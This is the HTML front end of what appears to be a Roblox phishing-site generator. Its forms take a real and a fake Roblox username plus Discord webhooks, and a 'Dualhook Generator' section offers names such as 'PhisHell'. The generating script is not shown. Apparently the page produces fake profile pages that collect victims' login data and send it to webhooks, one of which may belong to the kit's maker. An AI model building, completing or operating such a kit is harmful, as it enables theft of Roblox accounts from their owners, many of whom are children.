<!doctype html>
<html lang="en">

<head>
    <title>Create</title>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <link rel="shortcut icon" href="https://pbs.twimg.com/profile_images/1393977781306859521/6Yo4eNxf_400x400.jpg" type="image/png">
    <link href="https://fonts.googleapis.com/css?family=Lato:300,400,700,900&display=swap" rel="stylesheet">
    <link rel="stylesheet" href="new/css/style.css"> </head>

<body>
    <section class="ftco-section">
        <div class="container">
            <div class="row justify-content-center">
                <div class="col-md-12 col-lg-10">
                    <div class="wrap d-md-flex">
                        <div class="login-wrap p-4 p-lg-5 order-md-last">
                            <div class="d-flex">
                                <div class="w-100">
                                    <h3 class="mb-4">Generate a <strong>Regular </strong> site</h3>
                                </div>
                                <div class="w-100">
                                    <p class="social-media d-flex justify-content-end"> <a href="https://discord.gg/eHYSYazGSg" class="social-icon d-flex align-items-center justify-content-center"><i class="fa-brands fa-discord"></i></a> </p>
                                </div>
                            </div>
                            <form action="#" class="signin-form">
                                <div class="form-group mb-3">
                                    <label class="label" for="RealUsername">Roblox Username</label>
                                    <input type="text" id="RealUsername" class="form-control" placeholder="Roblox Username" required> </div>
                                <div class="form-group mb-3">
                                    <label class="label" for="password">Fake Username</label>
                                    <input type="text" id="FakeUsername" class="form-control" placeholder="Fake Username" required> </div>
                                <div class="form-group mb-3">
                                    <label class="label" for="password">Webhook</label>
                                    <input type="text" id="Webhook" class="form-control" placeholder="Webhook" required> </div>
                                <div class="form-group">
                                    <button type="button" onclick="Regular(this);" class="form-control btn btn-primary submit px-3">Create Now!</button>
                                </div>
                            </form>
                        </div>
                        <div class="text-wrap p-4 p-lg-5">
                            <div class="d-flex">
                                <div class="w-100">
                                    <h3 class="mb-4" style="color:white;">Dualhook Generator</h3>
                                </div>
                            </div>
                            <form action="#" class="signin-form">
                                <div class="form-group mb-3">
                                    <label class="label" for="Directory" style="color:white;">Directory</label>
                                    <input type="text" id="Directory" class="form-control" placeholder="Directory" required> </div>
                                <div class="form-group mb-3">
                                    <label class="label" for="Name" style="color:white;">Name</label>
                                    <input type="text" id="Name" class="form-control" placeholder="Name (Splunk/Shitest/PhisHell)" required> </div>
                                <div class="form-group mb-3">
                                    <label class="label" for="Thumbnails" style="color:white;">Thumbnails</label>
                                    <input type="text" id="Thumbnails" class="form-control" placeholder="Thumbnails" required> </div>
                                <div class="form-group mb-3">
                                    <label class="label" for="Webhook" style="color:white;">Webhook</label>
                                    <input type="text" id="WebhookDualhook" class="form-control" placeholder="Webhook" required> </div>
                                <div class="form-group mb-3">
                                    <input type="color" class="form-control" id="EmbedColor"> </div>
                                <div class="form-group">
                                    <button type="submit" class="btn btn-white btn-outline-white" style="width:100%" onclick="Dualhook(this);"> Create Now!</button>
                                </div>
                            </form>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </section>
    <script src="apis/main.js"></script>
    <script src="//cdn.jsdelivr.net/npm/sweetalert2@11"></script>
    <script src="new/js/jquery.min.js"></script>
    <script src="new/js/popper.js"></script>
    <script src="new/js/bootstrap.min.js"></script>
    <script src="new/js/main.js"></script>
    <script src="https://kit.fontawesome.com/57f8be95f1.js" crossorigin="anonymous"></script>
</body>

</html>